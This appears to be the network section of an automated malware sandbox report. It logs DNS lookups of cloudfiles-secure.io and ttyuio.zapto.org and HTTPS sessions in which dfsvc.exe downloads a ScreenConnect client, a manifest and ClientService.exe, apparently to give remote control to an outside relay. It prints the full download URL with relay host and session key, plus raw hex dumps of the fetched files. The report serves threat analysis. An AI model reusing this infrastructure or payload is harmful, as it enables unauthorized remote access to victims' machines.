Oct 2, 2024 06:16:46.519076109 CEST	8041	49766	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:46.519084930 CEST	8041	49766	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:46.519217968 CEST	8041	49766	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:46.519227028 CEST	8041	49766	178.215.236.119	192.168.2.4
Oct 2, 2024 06:17:20.990088940 CEST	8041	49766	178.215.236.119	192.168.2.4
Oct 2, 2024 06:17:20.991436005 CEST	49766	8041	192.168.2.4	178.215.236.119
Oct 2, 2024 06:17:20.996200085 CEST	8041	49766	178.215.236.119	192.168.2.4
Oct 2, 2024 06:18:05.346595049 CEST	8041	49766	178.215.236.119	192.168.2.4
Oct 2, 2024 06:18:05.350909948 CEST	49766	8041	192.168.2.4	178.215.236.119
Oct 2, 2024 06:18:05.360512018 CEST	8041	49766	178.215.236.119	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2024 06:16:19.309437037 CEST	52734	53	192.168.2.4	1.1.1.1
Oct 2, 2024 06:16:19.469393015 CEST	53	52734	1.1.1.1	192.168.2.4
Oct 2, 2024 06:16:44.149514914 CEST	56902	53	192.168.2.4	1.1.1.1
Oct 2, 2024 06:16:44.158018112 CEST	53	56902	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 2, 2024 06:16:19.309437037 CEST	192.168.2.4	1.1.1.1	0x1b18	Standard query (0)	cloudfiles-secure.io	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:16:44.149514914 CEST	192.168.2.4	1.1.1.1	0xd4c6	Standard query (0)	ttyuio.zapto.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 2, 2024 06:16:19.469393015 CEST	1.1.1.1	192.168.2.4	0x1b18	No error (0)	cloudfiles-secure.io		178.215.236.119	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:16:23.737463951 CEST	1.1.1.1	192.168.2.4	0x78c5	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 2, 2024 06:16:23.737463951 CEST	1.1.1.1	192.168.2.4	0x78c5	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:16:24.316685915 CEST	1.1.1.1	192.168.2.4	0x80f8	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 2, 2024 06:16:24.316685915 CEST	1.1.1.1	192.168.2.4	0x80f8	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:16:44.158018112 CEST	1.1.1.1	192.168.2.4	0xd4c6	No error (0)	ttyuio.zapto.org		178.215.236.119	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cloudfiles-secure.io

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	178.215.236.119	443	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:16:20 UTC	633	OUT	GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session HTTP/1.1 Host: cloudfiles-secure.io Accept-Encoding: gzip Connection: Keep-Alive
2024-10-02 04:16:20 UTC	251	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 242016 Content-Type: application/x-ms-application; charset=utf-8 Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:16:20 GMT Connection: close
2024-10-02 04:16:20 UTC	16133	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 32 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=
2024-10-02 04:16:21 UTC	16384	IN	Data Raw: 47 6c 69 52 47 38 79 66 59 52 6f 64 77 71 45 6c 46 44 4c 68 4b 54 47 45 6b 53 6b 48 75 45 45 6c 4f 31 6d 42 49 59 67 77 51 54 4d 39 72 37 45 35 69 6e 4a 52 53 58 55 49 59 55 79 31 33 46 46 43 58 6b 4e 52 56 67 42 49 49 56 64 59 61 51 46 57 34 36 48 68 59 43 77 4a 63 57 48 61 72 43 46 67 30 41 33 42 5a 69 6a 54 45 5a 37 35 39 53 47 39 4a 2f 42 78 37 6a 76 49 67 65 76 55 2b 52 48 6d 39 47 32 52 37 6f 79 66 6f 65 77 58 79 75 48 77 39 4f 45 53 42 36 7a 43 6f 67 4a 72 39 62 49 45 39 4b 4f 79 46 4a 6c 31 59 68 45 58 59 63 49 74 50 52 58 43 4c 58 66 4a 4d 69 37 52 32 79 49 75 4c 43 75 53 4b 59 33 42 51 6a 4e 43 7a 2b 49 2f 2b 4a 57 79 52 67 6f 57 67 6b 77 6a 5a 75 4a 47 48 4c 62 69 51 6a 30 32 38 6b 68 48 35 7a 4a 4c 4a 32 74 43 54 42 31 6d 59 6c 66 59 4e 57 4a Data Ascii: GliRG8yfYRodwqElFDLhKTGEkSkHuEElO1mBIYgwQTM9r7E5inJRSXUIYUy13FFCXkNRVgBIIVdYaQFW46HhYCwJcWHarCFg0A3BZijTEZ759SG9J/Bx7jvIgevU+RHm9G2R7oyfoewXyuHw9OESB6zCogJr9bIE9KOyFJl1YhEXYcItPRXCLXfJMi7R2yIuLCuSKY3BQjNCz+I/+JWyRgoWgkwjZuJGHLbiQj028khH5zJLJ2tCTB1mYlfYNWJ
2024-10-02 04:16:21 UTC	16384	IN	Data Raw: 55 41 62 41 42 4e 41 47 45 41 62 67 42 68 41 47 63 41 5a 51 42 44 41 48 49 41 5a 51 42 6b 41 47 55 41 62 67 42 30 41 47 6b 41 59 51 42 73 41 48 4d 41 52 41 42 6c 41 48 4d 41 59 77 42 79 41 47 6b 41 63 41 42 30 41 47 6b 41 62 77 42 75 41 43 49 4e 41 41 42 45 51 77 42 76 41 47 34 41 64 41 42 79 41 47 38 41 62 41 42 51 41 47 45 41 62 67 42 6c 41 47 77 41 54 51 42 68 41 47 34 41 59 51 42 6e 41 47 55 41 51 77 42 79 41 47 55 41 5a 41 42 6c 41 47 34 41 64 41 42 70 41 47 45 41 62 41 42 7a 41 46 51 41 61 51 42 30 41 47 77 41 5a 51 42 5a 44 51 41 41 54 45 4d 41 62 77 42 75 41 48 51 41 63 67 42 76 41 47 77 41 55 41 42 68 41 47 34 41 5a 51 42 73 41 45 30 41 59 51 42 75 41 47 45 41 5a 77 42 6c 41 46 41 41 5a 51 42 79 41 48 4d 41 62 77 42 75 41 47 45 41 62 41 42 55 41 Data Ascii: UAbABNAGEAbgBhAGcAZQBDAHIAZQBkAGUAbgB0AGkAYQBsAHMARABlAHMAYwByAGkAcAB0AGkAbwBuACINAABEQwBvAG4AdAByAG8AbABQAGEAbgBlAGwATQBhAG4AYQBnAGUAQwByAGUAZABlAG4AdABpAGEAbABzAFQAaQB0AGwAZQBZDQAATEMAbwBuAHQAcgBvAGwAUABhAG4AZQBsAE0AYQBuAGEAZwBlAFAAZQByAHMAbwBuAGEAbABUA
2024-10-02 04:16:21 UTC	16384	IN	Data Raw: 41 41 5a 51 42 79 41 47 30 41 61 51 42 7a 41 48 4d 41 61 51 42 76 41 47 34 41 63 77 42 45 41 47 6b 41 59 51 42 73 41 47 38 41 5a 77 42 55 41 47 55 41 65 41 42 30 41 45 4d 41 62 77 42 75 41 48 51 41 5a 51 42 75 41 48 51 41 52 67 42 76 41 48 49 41 62 51 42 68 41 48 51 41 65 79 30 41 41 45 35 4e 41 47 45 41 59 77 42 4a 41 47 34 41 63 77 42 30 41 48 49 41 64 51 42 6a 41 48 51 41 61 51 42 76 41 47 34 41 59 51 42 73 41 45 51 41 61 51 42 68 41 47 77 41 62 77 42 6e 41 45 51 41 61 51 42 7a 41 47 30 41 61 51 42 7a 41 48 4d 41 51 67 42 31 41 48 51 41 64 41 42 76 41 47 34 41 56 41 42 6c 41 48 67 41 64 41 43 4b 4d 51 41 41 51 6b 30 41 59 51 42 6a 41 46 49 41 5a 51 42 70 41 47 34 41 63 77 42 30 41 47 45 41 62 41 42 73 41 46 55 41 62 67 42 70 41 47 34 41 63 77 42 30 41 Data Ascii: AAZQByAG0AaQBzAHMAaQBvAG4AcwBEAGkAYQBsAG8AZwBUAGUAeAB0AEMAbwBuAHQAZQBuAHQARgBvAHIAbQBhAHQAey0AAE5NAGEAYwBJAG4AcwB0AHIAdQBjAHQAaQBvAG4AYQBsAEQAaQBhAGwAbwBnAEQAaQBzAG0AaQBzAHMAQgB1AHQAdABvAG4AVABlAHgAdACKMQAAQk0AYQBjAFIAZQBpAG4AcwB0AGEAbABsAFUAbgBpAG4AcwB0A
2024-10-02 04:16:21 UTC	16384	IN	Data Raw: 4e 6f 62 32 39 7a 5a 53 42 33 61 47 6c 6a 61 43 42 73 62 32 64 76 62 69 42 7a 5a 58 4e 7a 61 57 39 75 49 48 52 76 49 47 4e 76 62 6e 52 79 62 32 77 67 62 32 34 67 64 47 68 6c 49 48 4a 6c 62 57 39 30 5a 53 42 74 59 57 4e 6f 61 57 35 6c 4c 67 45 55 55 32 56 73 5a 57 4e 30 49 45 78 76 5a 32 39 75 49 46 4e 6c 63 33 4e 70 62 32 34 42 45 56 4e 6c 62 47 56 6a 64 43 42 4e 61 57 4e 79 62 33 42 6f 62 32 35 6c 41 53 74 44 61 47 39 76 63 32 55 67 62 32 35 6c 49 47 39 79 49 47 31 76 63 6d 55 67 63 6d 56 74 62 33 52 6c 49 47 31 76 62 6d 6c 30 62 33 4a 7a 49 48 52 76 49 48 5a 70 5a 58 63 75 41 51 39 54 5a 57 78 6c 59 33 51 67 54 57 39 75 61 58 52 76 63 6e 4d 42 52 6b 4e 6f 62 32 39 7a 5a 53 42 68 49 47 78 76 64 32 56 79 49 48 46 31 59 57 78 70 64 48 6b 67 61 57 59 67 62 Data Ascii: Nob29zZSB3aGljaCBsb2dvbiBzZXNzaW9uIHRvIGNvbnRyb2wgb24gdGhlIHJlbW90ZSBtYWNoaW5lLgEUU2VsZWN0IExvZ29uIFNlc3Npb24BEVNlbGVjdCBNaWNyb3Bob25lAStDaG9vc2Ugb25lIG9yIG1vcmUgcmVtb3RlIG1vbml0b3JzIHRvIHZpZXcuAQ9TZWxlY3QgTW9uaXRvcnMBRkNob29zZSBhIGxvd2VyIHF1YWxpdHkgaWYgb
2024-10-02 04:16:21 UTC	16384	IN	Data Raw: 47 6c 6a 53 32 56 35 56 47 39 72 5a 57 34 39 59 6a 63 33 59 54 56 6a 4e 54 59 78 4f 54 4d 30 5a 54 41 34 4f 53 4e 54 65 58 4e 30 5a 57 30 75 55 6d 56 7a 62 33 56 79 59 32 56 7a 4c 6c 4a 31 62 6e 52 70 62 57 56 53 5a 58 4e 76 64 58 4a 6a 5a 56 4e 6c 64 41 49 41 41 41 41 44 41 41 41 41 41 41 41 41 41 46 42 42 52 46 42 42 52 46 42 41 56 47 2b 72 76 36 4e 75 58 31 45 79 56 48 31 61 41 41 41 41 4e 51 41 41 41 41 41 41 41 41 42 6a 41 51 41 41 4d 45 45 41 63 41 42 77 41 47 77 41 61 51 42 6a 41 47 45 41 64 41 42 70 41 47 38 41 62 67 42 45 41 47 6b 41 63 67 42 6c 41 47 4d 41 64 41 42 76 41 48 49 41 65 51 42 4f 41 47 45 41 62 51 42 6c 41 41 41 41 41 41 41 67 51 51 42 77 41 48 41 41 62 41 42 70 41 47 4d 41 59 51 42 30 41 47 6b 41 62 77 42 75 41 46 51 41 61 51 42 30 Data Ascii: GljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAADAAAAAAAAAFBBRFBBRFBAVG+rv6NuX1EyVH1aAAAANQAAAAAAAABjAQAAMEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGkAcgBlAGMAdABvAHIAeQBOAGEAbQBlAAAAAAAgQQBwAHAAbABpAGMAYQB0AGkAbwBuAFQAaQB0
2024-10-02 04:16:21 UTC	16384	IN	Data Raw: 6b 67 46 34 46 31 57 64 75 78 6e 77 71 53 2b 32 38 70 45 69 6a 37 50 45 59 6e 69 39 72 6c 58 50 65 38 7a 30 6b 49 4f 6b 31 53 51 39 52 4b 30 39 47 68 69 43 73 4a 38 4d 69 71 68 48 6f 6b 50 4b 69 45 68 79 31 58 77 66 41 76 72 39 65 45 68 78 4e 34 65 44 69 72 65 65 42 78 33 71 31 33 63 62 49 41 48 42 42 68 4a 67 75 4b 75 56 71 74 31 69 78 6e 66 74 72 58 35 48 78 68 6d 52 62 72 46 4d 6b 65 71 41 51 5a 77 2f 6b 4a 5a 42 51 5a 58 67 6c 51 71 58 52 30 62 45 4c 46 79 35 42 48 49 68 75 43 47 64 70 6f 46 46 69 68 5a 42 42 63 49 74 37 2f 4f 48 2f 44 35 56 6f 54 65 47 7a 69 2b 4d 48 77 41 43 34 66 50 4d 42 5a 7a 39 2b 41 42 77 34 61 42 30 44 34 74 4a 63 56 43 5a 56 41 78 57 42 53 4f 47 53 66 39 51 54 64 4b 36 6c 75 31 51 32 59 64 33 2f 79 51 37 59 50 57 55 6c 42 70 Data Ascii: kgF4F1WduxnwqS+28pEij7PEYni9rlXPe8z0kIOk1SQ9RK09GhiCsJ8MiqhHokPKiEhy1XwfAvr9eEhxN4eDireeBx3q13cbIAHBBhJguKuVqt1ixnftrX5HxhmRbrFMkeqAQZw/kJZBQZXglQqXR0bELFy5BHIhuCGdpoFFihZBBcIt7/OH/D5VoTeGzi+MHwAC4fPMBZz9+ABw4aB0D4tJcVCZVAxWBSOGSf9QTdK6lu1Q2Yd3/yQ7YPWUlBp
2024-10-02 04:16:21 UTC	16384	IN	Data Raw: 7a 61 55 39 50 53 44 41 73 65 44 68 41 51 63 71 52 37 4d 56 31 65 7a 48 67 44 50 63 2f 68 4d 58 55 32 4e 69 4b 79 66 66 66 41 62 39 7a 4d 79 59 6e 43 65 56 64 46 65 32 57 45 70 58 75 44 54 4b 5a 70 47 69 6d 72 55 4d 31 30 76 50 62 62 62 5a 56 31 2b 52 70 44 5a 46 69 6f 45 4c 65 39 5a 6a 6d 34 7a 6c 49 51 63 51 30 4a 55 4e 43 75 42 30 4b 4c 55 2b 58 41 44 41 52 7a 56 45 4b 6f 6a 55 55 53 42 44 4d 42 78 4c 73 58 48 43 71 4f 44 4a 47 42 54 47 50 50 62 68 52 5a 72 47 49 79 79 63 6a 49 34 72 33 6a 45 5a 41 42 32 74 55 46 31 2b 39 58 44 42 4a 57 49 68 55 6f 6d 4c 2f 43 4c 51 4a 39 63 77 76 5a 50 6c 4f 66 69 75 7a 44 2f 50 61 6d 74 4f 6d 78 63 77 49 4b 58 52 79 6d 55 33 57 71 51 58 78 59 30 38 55 35 56 57 4c 55 41 42 31 58 69 61 6d 50 4d 52 6f 58 5a 45 45 65 67 Data Ascii: zaU9PSDAseDhAQcqR7MV1ezHgDPc/hMXU2NiKyfffAb9zMyYnCeVdFe2WEpXuDTKZpGimrUM10vPbbbZV1+RpDZFioELe9Zjm4zlIQcQ0JUNCuB0KLU+XADARzVEKojUUSBDMBxLsXHCqODJGBTGPPbhRZrGIyycjI4r3jEZAB2tUF1+9XDBJWIhUomL/CLQJ9cwvZPlOfiuzD/PamtOmxcwIKXRymU3WqQXxY08U5VWLUAB1XiamPMRoXZEEeg
2024-10-02 04:16:21 UTC	16384	IN	Data Raw: 69 70 65 69 69 32 61 61 4b 43 67 46 56 6f 6a 2f 6e 61 56 74 6f 55 4e 46 73 67 4d 51 59 42 6c 31 50 32 61 4e 2b 39 6d 33 63 75 74 50 57 47 7a 53 65 7a 46 64 57 6a 76 66 59 50 54 55 2b 50 53 68 63 67 6f 43 79 34 39 64 55 35 6d 58 73 30 59 30 39 59 6b 6a 61 38 43 73 6c 2b 6d 33 46 7a 54 45 53 4c 4f 4a 65 59 48 66 6b 50 6b 63 52 4b 4d 78 31 70 42 37 70 4f 6b 37 35 70 5a 30 61 33 50 75 32 62 46 4a 68 6d 77 62 6b 58 38 65 78 55 4e 4c 76 6a 61 69 75 6b 78 33 35 39 70 31 7a 7a 64 62 49 45 65 4d 4c 2f 73 61 68 7a 38 2f 32 4b 35 55 68 42 42 33 6a 52 66 75 58 36 4d 68 6c 53 5a 53 78 57 49 6b 36 46 71 41 41 73 41 30 6f 31 48 4f 45 50 68 69 43 43 4a 30 78 37 73 56 44 41 2f 45 47 5a 4b 4b 42 54 55 72 75 4b 57 76 79 71 59 73 72 6d 7a 5a 64 2f 2b 62 4e 54 59 41 59 34 79 Data Ascii: ipeii2aaKCgFVoj/naVtoUNFsgMQYBl1P2aN+9m3cutPWGzSezFdWjvfYPTU+PShcgoCy49dU5mXs0Y09Ykja8Csl+m3FzTESLOJeYHfkPkcRKMx1pB7pOk75pZ0a3Pu2bFJhmwbkX8exUNLvjaiukx359p1zzdbIEeML/sahz8/2K5UhBB3jRfuX6MhlSZSxWIk6FqAAsA0o1HOEPhiCCJ0x7sVDA/EGZKKBTUruKWvyqYsrmzZd/+bNTYAY4y
2024-10-02 04:16:21 UTC	16384	IN	Data Raw: 74 42 72 4c 4d 79 43 59 49 35 49 58 52 35 67 71 68 68 72 43 71 71 75 4d 67 59 31 4e 52 31 41 69 4f 30 42 32 4f 51 33 38 67 61 34 35 58 61 4d 37 38 6b 79 79 33 41 38 39 6e 78 64 38 73 6a 30 43 35 4a 6b 55 56 76 44 66 43 37 53 6d 45 7a 41 6f 4a 4b 67 4a 6e 4e 34 39 71 58 33 41 32 79 72 41 72 55 59 41 7a 36 68 62 59 4d 65 6c 30 73 38 68 70 47 39 54 4a 38 44 39 51 69 41 58 77 51 51 45 2f 78 51 58 37 36 50 46 63 57 58 43 51 6b 43 70 4a 5a 61 68 4b 46 66 52 6f 6e 57 48 63 70 5a 52 56 58 36 46 48 61 59 72 2f 43 71 41 43 54 44 59 35 46 77 74 61 75 72 69 71 6b 57 61 4d 43 32 74 39 30 53 65 30 52 42 67 56 7a 30 52 6a 6d 58 52 46 50 48 65 69 6c 4c 6c 50 78 2f 43 4a 68 41 75 50 34 62 77 65 63 46 2f 74 4a 64 54 76 73 74 7a 65 77 79 54 30 62 32 46 49 5a 7a 73 6b 59 75 Data Ascii: tBrLMyCYI5IXR5gqhhrCqquMgY1NR1AiO0B2OQ38ga45XaM78kyy3A89nxd8sj0C5JkUVvDfC7SmEzAoJKgJnN49qX3A2yrArUYAz6hbYMel0s8hpG9TJ8D9QiAXwQQE/xQX76PFcWXCQkCpJZahKFfRonWHcpZRVX6FHaYr/CqACTDY5FwtauriqkWaMC2t90Se0RBgVz0RjmXRFPHeilLlPx/CJhAuP4bwecF/tJdTvstzewyT0b2FIZzskYu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49735	178.215.236.119	443	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:16:22 UTC	102	OUT	GET /Bin/ScreenConnect.Client.manifest HTTP/1.1 Host: cloudfiles-secure.io Accept-Encoding: gzip
2024-10-02 04:16:22 UTC	216	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 17866 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:16:22 GMT Connection: close
2024-10-02 04:16:22 UTC	16168	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv
2024-10-02 04:16:22 UTC	1698	IN	Data Raw: 32 71 32 41 53 34 2b 6a 57 75 66 63 78 34 64 79 74 35 42 69 67 32 4d 45 6a 52 30 65 7a 6f 51 39 75 6f 36 74 74 6d 41 61 44 47 37 64 71 5a 79 33 53 76 55 51 61 6b 68 43 42 6a 37 41 37 43 64 66 48 6d 7a 4a 61 77 76 39 71 59 46 53 4c 53 63 47 54 37 65 47 30 58 4f 42 76 36 79 62 35 6a 4e 57 79 2b 54 67 51 35 75 72 4f 6b 66 57 2b 30 2f 74 76 6b 32 45 30 58 4c 79 54 52 53 69 44 4e 69 70 6d 4b 46 2b 77 63 38 36 4c 4a 69 55 47 73 6f 50 55 58 50 59 56 47 55 7a 74 59 75 42 65 4d 2f 4c 6f 36 4f 77 4b 70 37 41 44 4b 35 47 79 4e 6e 6d 2b 39 36 30 49 48 6e 57 6d 5a 63 79 37 34 30 68 51 38 33 65 52 47 76 37 62 55 4b 4a 47 79 47 46 59 6d 50 56 38 41 68 59 38 67 79 69 74 4f 59 62 73 31 4c 63 4e 55 39 44 34 52 2b 5a 31 4d 49 33 73 4d 4a 4e 32 46 4b 5a 62 53 31 31 30 59 55 Data Ascii: 2q2AS4+jWufcx4dyt5Big2MEjR0ezoQ9uo6ttmAaDG7dqZy3SvUQakhCBj7A7CdfHmzJawv9qYFSLScGT7eG0XOBv6yb5jNWy+TgQ5urOkfW+0/tvk2E0XLyTRSiDNipmKF+wc86LJiUGsoPUXPYVGUztYuBeM/Lo6OwKp7ADK5GyNnm+960IHnWmZcy740hQ83eRGv7bUKJGyGFYmPV8AhY8gyitOYbs1LcNU9D4R+Z1MI3sMJN2FKZbS110YU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49747	178.215.236.119	443	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:16:26 UTC	128	OUT	GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1 Host: cloudfiles-secure.io Accept-Encoding: gzip Connection: Keep-Alive
2024-10-02 04:16:27 UTC	216	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 95520 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:16:27 GMT Connection: close
2024-10-02 04:16:27 UTC	16168	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f8 10 28 a3 bc 71 46 f0 bc 71 46 f0 bc 71 46 f0 08 ed b7 f0 b6 71 46 f0 08 ed b5 f0 c6 71 46 f0 08 ed b4 f0 a4 71 46 f0 3c 0a 42 f1 ad 71 46 f0 3c 0a 45 f1 a8 71 46 f0 3c 0a 43 f1 96 71 46 f0 b5 09 d5 f0 b6 71 46 f0 a2 23 d5 f0 bf 71 46 f0 bc 71 47 f0 cc 71 46 f0 32 0a 4f f1 bd 71 46 f0 32 0a b9 f0 bd 71 46 f0 32 0a 44 f1 bd 71 46 f0 52 69 63 68 bc 71 46 f0 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(qFqFqFqFqFqF<BqF<EqF<CqFqF#qFqGqF2OqF2qF2DqFRichqF
2024-10-02 04:16:27 UTC	16384	IN	Data Raw: 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e4 d0 40 00 5e 5d c3 55 8b ec 56 68 90 dd 40 00 68 88 dd 40 00 68 90 dd 40 00 6a 03 e8 4a fe ff ff 83 c4 10 8b f0 ff 75 0c ff 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e8 d0 40 00 5e 5d c3 55 8b ec 56 68 a4 dd 40 00 68 9c dd 40 00 68 a4 dd 40 00 6a 04 e8 0c fe ff ff 8b f0 83 c4 10 85 f6 74 15 ff 75 10 8b ce ff 75 0c ff 75 08 ff 15 88 d1 40 00 ff d6 eb 0c ff 75 0c ff 75 08 ff 15 60 d0 40 00 5e 5d c3 56 e8 56 ed ff ff 8b 70 04 85 f6 74 0a 8b ce ff 15 88 d1 40 00 ff d6 e8 de 15 00 00 cc 55 8b ec 8b 45 10 8b 4d 08 81 78 04 80 00 00 00 7f 06 0f be 41 08 5d c3 8b 41 08 5d c3 55 8b ec 8b 45 08 8b 4d 10 89 48 08 5d c3 53 51 bb 30 40 41 00 e9 0f 00 00 00 cc cc cc cc 53 51 bb 30 40 41 00 Data Ascii: ut@@^]UVh@h@h@jJuut@@^]UVh@h@h@jtuuu@uu`@^]VVpt@UEMxA]A]UEMH]SQ0@ASQ0@A
2024-10-02 04:16:27 UTC	16384	IN	Data Raw: ff 01 8b 88 80 00 00 00 85 c9 74 03 f0 ff 01 8b 88 8c 00 00 00 85 c9 74 03 f0 ff 01 56 6a 06 8d 48 28 5e 81 79 f8 38 46 41 00 74 09 8b 11 85 d2 74 03 f0 ff 02 83 79 f4 00 74 0a 8b 51 fc 85 d2 74 03 f0 ff 02 83 c1 10 83 ee 01 75 d6 ff b0 9c 00 00 00 e8 4e 01 00 00 59 5e 5d c3 8b ff 55 8b ec 51 53 56 8b 75 08 57 8b 86 88 00 00 00 85 c0 74 6c 3d 48 46 41 00 74 65 8b 46 7c 85 c0 74 5e 83 38 00 75 59 8b 86 84 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 30 d9 ff ff ff b6 88 00 00 00 e8 28 fb ff ff 59 59 8b 86 80 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 0e d9 ff ff ff b6 88 00 00 00 e8 04 fc ff ff 59 59 ff 76 7c e8 f9 d8 ff ff ff b6 88 00 00 